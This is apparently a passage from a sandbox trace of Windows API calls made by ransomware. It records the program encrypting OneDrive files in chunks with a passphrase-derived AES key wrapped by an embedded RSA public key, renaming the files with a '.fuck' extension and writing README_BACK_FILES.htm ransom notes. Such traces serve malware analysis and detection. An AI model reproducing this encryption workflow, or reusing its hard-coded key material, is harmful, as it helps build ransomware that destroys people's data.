dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.309] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.309] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.309] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.310] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.310] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.310] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.310] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.310] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.310] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.310] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x248, lpOverlapped=0x0) returned 1 [0274.310] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x248, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x250) returned 1 [0274.310] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x250, lpOverlapped=0x0) returned 1 [0274.310] CloseHandle (hObject=0x5d48) returned 1 [0274.310] CloseHandle (hObject=0x5d3c) returned 1 [0274.310] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0274.317] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0274.317] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0274.320] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0274.321] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0274.321] CryptDestroyKey (hKey=0x2faac8) returned 1 [0274.321] CryptReleaseContext (hProv=0x2f2a6b8, dwFlags=0x0) returned 1 [0274.321] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0274.321] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0274.321] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\readme_back_files.htm")) returned 0xffffffff [0274.322] AreFileApisANSI () returned 1 [0274.322] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x28892e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0274.322] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0274.323] GetFileType (hFile=0x5d4c) returned 0x1 [0274.323] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0274.325] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0274.325] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0274.326] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.326] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0274.326] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0274.326] GetLastError () returned 0x0 [0274.326] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\filesync.localizedresources.dll.mui")) returned 0x20 [0274.328] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0274.329] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0274.329] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0274.331] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0274.331] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2ac90) returned 1 [0274.333] CryptCreateHash (in: hProv=0x2f2ac90, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0274.334] lstrlenA (lpString="PWQkExpxZXxSXKbOvauNRKinzMlQm") returned 29 [0274.334] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0274.334] CryptDeriveKey (in: hProv=0x2f2ac90, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2faac8) returned 1 [0274.334] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0274.334] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0274.334] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2a8d8) returned 1 [0274.334] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2a8d8, dwCertEncodingType=0x1, pInfo=0x2f337b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f337e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f337e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fb4c8) returned 1 [0274.334] CryptEncrypt (in: hKey=0x2fb4c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0274.334] CryptEncrypt (in: hKey=0x2fb4c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2a058*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2a058*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0274.335] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2a058*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2a058*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0274.336] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.341] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.342] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.345] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.345] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.345] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.345] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.345] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.346] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.346] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.346] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.346] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.346] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.346] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.346] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.347] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.347] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.347] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.347] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.347] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.347] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.347] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.347] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.347] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.347] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.347] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.347] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.347] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.348] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.348] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.348] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.348] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.348] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.348] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.348] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.348] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.348] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.348] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.348] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.348] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.348] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.348] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.349] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.349] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.349] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.349] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.349] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.349] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.349] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.349] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.349] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.349] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.349] CryptEncrypt (in: hKey=0x2faac8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: 